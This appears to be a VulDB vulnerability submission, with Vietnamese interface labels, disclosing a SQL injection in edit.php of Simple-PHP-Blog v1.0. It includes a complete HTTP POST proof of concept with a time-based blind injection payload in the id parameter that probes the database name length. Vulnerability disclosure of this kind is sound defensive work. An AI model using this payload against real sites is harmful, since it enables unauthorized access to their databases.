| tiêu đề | Philip Okugbe Simple-PHP-Blog v1.0 SQL Injection |
|---|
| Mô tả | Download and set up this PHP system from https://github.com/Philipinho/Simple-PHP-Blog. Then, in the edit.php file, you will notice that the id parameter is not filtered or forcibly type-casted, which makes it possible for SQL injection attacks.
POC:
POST /edit.php HTTP/1.1
Host: xxxxxxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Edg/x.x.x.x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=lib8291dc1lcn1lh4nrg2d1nti
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
upd=1&id=1+OR+if(length(database())=12,sleep(2),exp(710))--&title=InjectedTitle&description=InjectedDescription&slug=injected-slug
Using this POC, SQL injection and time delay injection can be employed to inject into the length of the database. The duration of the delay is three times the value of 'x' in 'sleep(x)'. |
|---|
| Nguồn | ⚠️ https://github.com/woshinenbaba/CVE-/issues/1 |
|---|
| Người dùng | xiaofeifei (UID 92996) |
|---|
| Đệ trình | 26/11/2025 12:35 (cách đây 5 các tháng) |
|---|
| Kiểm duyệt | 07/12/2025 18:51 (11 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 334669 [Philipinho Simple-PHP-Blog đến 94b5d3e57308bce5dfbc44c3edafa9811893d958 /edit.php Tiêm SQL] |
|---|
| điểm | 20 |
|---|